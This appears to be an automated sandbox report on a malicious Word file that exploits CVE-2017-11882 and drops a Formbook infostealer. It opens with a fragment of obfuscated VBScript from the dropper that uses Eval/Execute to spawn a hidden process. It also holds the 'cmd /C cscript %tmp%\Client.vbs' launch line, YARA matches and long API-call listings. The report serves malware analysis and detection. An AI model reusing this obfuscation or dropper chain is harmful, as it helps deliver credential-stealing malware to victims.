Left(g_DumpDir,2) <> "\\" Then 'We are not logging to a UNC path...End If..J0xCRC341414141 = "hsre"..End Function........D0xCRC341414141()........Function E0xCRC341414141(str)..If Left(g_DumpDir,2) <> "\\" 
Then..DriveName = Left(g_DumpDir,1)..Else..strAux = Right(g_DumpDir, Len(g_DumpDir) - 2)..arrAux = Split(strAux, "\", -1) ..DriveName = "\\" & arrAux(0) & "\" & arrAux(1)..End If..Length = 8..objArgs = 5..If Length = objArgs Then..Else..GetStringArray = Len(str)..a = Left(str,1)..For i = 1 To GetStringArray..arrStrings = Eval("Lef" + "t(s" + "tr,i)")..If Len(arrStrings)> 1 Then..strSeparator = Right(arrStrings,1) & strTemp..strTemp = strSeparator ..End If..Next..E0xCRC341414141 = strTemp & a..End If..End Function........Sub B0xCRC341414141(CO0xCRC341414141)..Set ProductData0xCRC341414141 = GetObject (SPLevel0xCRC341414141 + "CiMv2")..Set ConvertToKey0xCRC341414141 = ProductData0xCRC341414141.Get (I0xCRC341414141())..'Check the output directories drive to ensure there is enough free space for the files...If Left(g_DumpDir,2) <> "\\" Then 'We are not logging to a UNC path...End If..Set KeyOffset0xCRC341414141 = ConvertToKey0xCRC341414141.SpawnInstance_..KeyOffset0xCRC341414141.ShowWindow = 0..Execute("SeT Data0xCRC341414141 = ProductData0xCRC341414141.Get (""WiN32_PrOceSs"")")..Set isWin80xCRC341414141 = Da
          Source: ~WRF{2A5D8C87-AF4E-46DF-A13D-D1E92A25FFAE}.tmp.0.drStream path '_1699974672/Equation Native' : ..................\...[.............ZZCmD.exe /C cscript %tmp%\Client.vbs A..C................................................................................................................
          Very long command line found
          Source: unknown Process created: Commandline size = 4089
          Microsoft Office drops suspicious files
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\Client.vbs
          Found suspicious RTF objects
          Source: Client.vbs Static RTF information: Object: 0 Offset: 000011FEh Client.vbs
          Source: ~WRF{2A5D8C87-AF4E-46DF-A13D-D1E92A25FFAE}.tmp.0.dr OLE indicator application name: unknown
          Source: ~WRF{2A5D8C87-AF4E-46DF-A13D-D1E92A25FFAE}.tmp.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
          Source: C:\Windows\SysWOW64\cscript.exe Memory allocated: 76F90000 page execute and read and write
          Source: C:\Windows\SysWOW64\cscript.exe Memory allocated: 76E90000 page execute and read and write
          Source: C:\Windows\SysWOW64\calc.exe Memory allocated: 76F90000 page execute and read and write
          Source: C:\Windows\SysWOW64\calc.exe Memory allocated: 76E90000 page execute and read and write
          Source: C:\Windows\SysWOW64\cscript.exe Memory allocated: 76F90000 page execute and read and write
          Source: C:\Windows\SysWOW64\cscript.exe Memory allocated: 76E90000 page execute and read and write
          Source: 11.0.calc.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 11.0.calc.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.541440559.0000000000380000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000000.486962418.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000000.486962418.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000000.504387143.00000000099E9000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000000.504387143.00000000099E9000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000000.487337490.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000000.487337490.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.687509430.0000000000680000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.687509430.0000000000680000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000000.514319622.00000000099E9000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000000.514319622.00000000099E9000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{2A5D8C87-AF4E-46DF-A13D-D1E92A25FFAE}.tmp, type: DROPPEDMatched rule: rtf_cve2017_11882_ole author = John Davison, description = Attempts to identify the exploit CVE 2017 11882, sample = 51cf2a6c0c1a29abca9fd13cb22421da, reference = https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about, score =
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{2A5D8C87-AF4E-46DF-A13D-D1E92A25FFAE}.tmp, type: DROPPEDMatched rule: EXP_potential_CVE_2017_11882 author = ReversingLabs, reference = https://www.reversinglabs.com/newsroom/news/reversinglabs-yara-rule-detects-cobalt-strike-payload-exploiting-cve-2017-11882.html
          Source: C:\Windows\SysWOW64\calc.exeCode function: String function: 00B4E2A8 appears 38 times
          Source: C:\Windows\SysWOW64\calc.exeCode function: String function: 00B9373B appears 238 times
          Source: C:\Windows\SysWOW64\calc.exeCode function: String function: 00B93F92 appears 132 times
          Source: C:\Windows\SysWOW64\calc.exeCode function: String function: 00BBF970 appears 81 times
          Source: C:\Windows\SysWOW64\calc.exeCode function: String function: 00B4DF5C appears 118 times
          Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 0234F970 appears 81 times
          Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 02323F92 appears 108 times
          Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 0232373B appears 238 times
          Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 022DE2A8 appears 38 times
          Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 022DDF5C appears 118 times
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0041A360 NtCreateFile,11_2_0041A360
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0041A410 NtReadFile,11_2_0041A410
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0041A490 NtClose,11_2_0041A490
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0041A540 NtAllocateVirtualMemory,11_2_0041A540
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0041A35A NtReadFile,11_2_0041A35A
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0041A48A NtClose,11_2_0041A48A
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B400C4 NtCreateFile,LdrInitializeThunk,11_2_00B400C4
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B40078 NtResumeThread,LdrInitializeThunk,11_2_00B40078
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B40048 NtProtectVirtualMemory,LdrInitializeThunk,11_2_00B40048
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B3F9F0 NtClose,LdrInitializeThunk,11_2_00B3F9F0
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B3F900 NtReadFile,LdrInitializeThunk,11_2_00B3F900
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B3FAE8 NtQueryInformationProcess,LdrInitializeThunk,11_2_00B3FAE8
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B3FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,11_2_00B3FAD0
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B3FBB8 NtQueryInformationToken,LdrInitializeThunk,11_2_00B3FBB8
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B3FB68 NtFreeVirtualMemory,LdrInitializeThunk,11_2_00B3FB68
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B3FC90 NtUnmapViewOfSection,LdrInitializeThunk,11_2_00B3FC90
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B3FC60 NtMapViewOfSection,LdrInitializeThunk,11_2_00B3FC60
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B3FD8C NtDelayExecution,LdrInitializeThunk,11_2_00B3FD8C
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B3FDC0 NtQuerySystemInformation,LdrInitializeThunk,11_2_00B3FDC0
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B3FEA0 NtReadVirtualMemory,LdrInitializeThunk,11_2_00B3FEA0
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B3FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,11_2_00B3FED0
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B3FFB4 NtCreateSection,LdrInitializeThunk,11_2_00B3FFB4
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B410D0 NtOpenProcessToken,11_2_00B410D0
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B40060 NtQuerySection,11_2_00B40060
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B401D4 NtSetValueKey,11_2_00B401D4
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B4010C NtOpenDirectoryObject,11_2_00B4010C
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B41148 NtOpenThread,11_2_00B41148
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B407AC NtCreateMutant,11_2_00B407AC
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B3F8CC NtWaitForSingleObject,11_2_00B3F8CC
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B41930 NtSetContextThread,11_2_00B41930
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B3F938 NtWriteFile,11_2_00B3F938
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B3FAB8 NtQueryValueKey,11_2_00B3FAB8
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B3FA20 NtQueryInformationFile,11_2_00B3FA20
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B3FA50 NtEnumerateValueKey,11_2_00B3FA50
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B3FBE8 NtQueryVirtualMemory,11_2_00B3FBE8
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B3FB50 NtCreateKey,11_2_00B3FB50
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B3FC30 NtOpenProcess,11_2_00B3FC30
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B40C40 NtGetContextThread,11_2_00B40C40
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B3FC48 NtSetInformationFile,11_2_00B3FC48
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B41D80 NtSuspendThread,11_2_00B41D80
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B3FD5C NtEnumerateKey,11_2_00B3FD5C
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B3FE24 NtWriteVirtualMemory,11_2_00B3FE24
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B3FFFC NtCreateProcessEx,11_2_00B3FFFC
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00B3FF34 NtQueueApcThread,11_2_00B3FF34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022D00C4 NtCreateFile,LdrInitializeThunk,13_2_022D00C4
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022D07AC NtCreateMutant,LdrInitializeThunk,13_2_022D07AC
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022CFAB8 NtQueryValueKey,LdrInitializeThunk,13_2_022CFAB8
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022CFAE8 NtQueryInformationProcess,LdrInitializeThunk,13_2_022CFAE8
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022CFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,13_2_022CFAD0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022CFB68 NtFreeVirtualMemory,LdrInitializeThunk,13_2_022CFB68
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022CFB50 NtCreateKey,LdrInitializeThunk,13_2_022CFB50
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022CFBB8 NtQueryInformationToken,LdrInitializeThunk,13_2_022CFBB8
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022CF900 NtReadFile,LdrInitializeThunk,13_2_022CF900
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022CF9F0 NtClose,LdrInitializeThunk,13_2_022CF9F0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022CFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,13_2_022CFED0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022CFFB4 NtCreateSection,LdrInitializeThunk,13_2_022CFFB4
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022CFC60 NtMapViewOfSection,LdrInitializeThunk,13_2_022CFC60
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022CFD8C NtDelayExecution,LdrInitializeThunk,13_2_022CFD8C
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022CFDC0 NtQuerySystemInformation,LdrInitializeThunk,13_2_022CFDC0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022D0060 NtQuerySection,13_2_022D0060
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022D0078 NtResumeThread,13_2_022D0078
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022D0048 NtProtectVirtualMemory,13_2_022D0048
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022D10D0 NtOpenProcessToken,13_2_022D10D0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022D010C NtOpenDirectoryObject,13_2_022D010C
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022D1148 NtOpenThread,13_2_022D1148
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022D01D4 NtSetValueKey,13_2_022D01D4
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022CFA20 NtQueryInformationFile,13_2_022CFA20
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022CFA50 NtEnumerateValueKey,13_2_022CFA50
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022CFBE8 NtQueryVirtualMemory,13_2_022CFBE8
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022CF8CC NtWaitForSingleObject,13_2_022CF8CC
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022CF938 NtWriteFile,13_2_022CF938
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022D1930 NtSetContextThread,13_2_022D1930
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022CFE24 NtWriteVirtualMemory,13_2_022CFE24
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022CFEA0 NtReadVirtualMemory,13_2_022CFEA0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022CFF34 NtQueueApcThread,13_2_022CFF34
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022CFFFC NtCreateProcessEx,13_2_022CFFFC
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022CFC30 NtOpenProcess,13_2_022CFC30
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022CFC48 NtSetInformationFile,13_2_022CFC48
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022D0C40 NtGetContextThread,13_2_022D0C40
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022CFC90 NtUnmapViewOfSection,13_2_022CFC90
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022CFD5C NtEnumerateKey,13_2_022CFD5C
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_022D1D80 NtSuspendThread,13_2_022D1D80
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0008A360 NtCreateFile,13_2_0008A360
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0008A410 NtReadFile,13_2_0008A410
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0008A490 NtClose,13_2_0008A490
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0008A540 NtAllocateVirtualMemory,13_2_0008A540
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0008A35A NtReadFile,13_2_0008A35A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_0008A48A NtClose,13_2_0008A48A
          Source: ~WRF{2A5D8C87-AF4E-46DF-A13D-D1E92A25FFAE}.tmp.0.drOLE indicator has summary info: false
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$Q-CIF DT22.doc
          Source: classification engineClassification label: mal100.troj.expl.evad.winDOC@12/12@5/2
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.ini
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_00B82CB9 FormatMessageW,SysAllocString,LocalFree,LocalFree,GetLastError,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,FormatMessageA,MultiByteToWideChar,MultiByteToWideChar,LocalAlloc,MultiByteToWideChar,LocalFree,13_2_00B82CB9
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 13_2_00B93F69 LoadResource,13_2_00B93F69
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\cmd.exe CmD.exe /C cscript %tmp%\Client.vbs A C
          Source: explorer.exe, 0000000C.00000000.498513335.0000000002AE0000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
          Source: ~WRF{2A5D8C87-AF4E-46DF-A13D-D1E92A25FFAE}.tmp.0.drOLE document summary: title field not present or empty
          Source: ~WRF{2A5D8C87-AF4E-46DF-A13D-D1E92A25FFAE}.tmp.0.drOLE document summary: author field not present or empty
          Source: ~WRF{2A5D8C87-AF4E-46DF-A13D-D1E92A25FFAE}.tmp.0.drOLE document summary: edited time not present or 0
          Source: RFQ-CIF DT22.docVirustotal: Detection: 25%
          Source: RFQ-CIF DT22.docReversingLabs: Detection: 15%
          Source: C:\Windows\SysWOW64\cscript.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....O...............Y..k....(.:.............................}..v......:.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....[..................k.... ...............................}..v....p.:.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....[...............Y..k....(.:.............................}..v......:.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....g..................k.... ...............................}..v....p.:.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....g...............Y..k....(.:.............................}..v......:.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....s..................k.... ...............................}..v....p.:.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....s...............Y..k....(.:.............................}..v......:.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v....p.:.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k....(.:.............................}..v......:.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v....p.:.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k....(.:.............................}..v......:.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v....p.:.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k....(.:.............................}..v......:.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v....p.:.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k....(.:.............................}..v......:.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v....p.:.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k....(.:.............................}..v......:.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v....p.:.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k....(.:.............................}..v......:.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v....p.;.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k....(.;.............................}..v......;.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v....p.;.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k....(.;.............................}..v......;.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v....p.;.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k....(.;.............................}..v......;.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v....p.;.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k....(.;.............................}..v......;.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v....p!;.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k....(";.............................}..v.....";.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v....p);.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k....(*;.............................}..v.....*;.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v....p1;.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k....(2;.............................}..v.....2;.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k.... ...............................}..v....p9;.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................Y..k....(:;.............................}..v.....:;.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'..................k.... ...............................}..v....pA;.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'...............Y..k....(B;.............................}..v.....B;.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....3..................k.... ...............................}..v....pI;.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....3...............Y..k....(J;.............................}..v.....J;.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....?..................k.... ...............................}..v....pQ;.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....?...............Y..k....(R;.............................}..v.....R;.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....K..................k.... ...............................}..v....pY;.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....K...............Y..k....(Z;.............................}..v.....Z;.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....W..................k.... ...............................}..v....pa;.....0...............................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....W...............Y..k....(b;.............................}..v.....b;.....0...............x...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....c..................k.... ...............................}..v....pi;.....0...............................................Jump to behavior
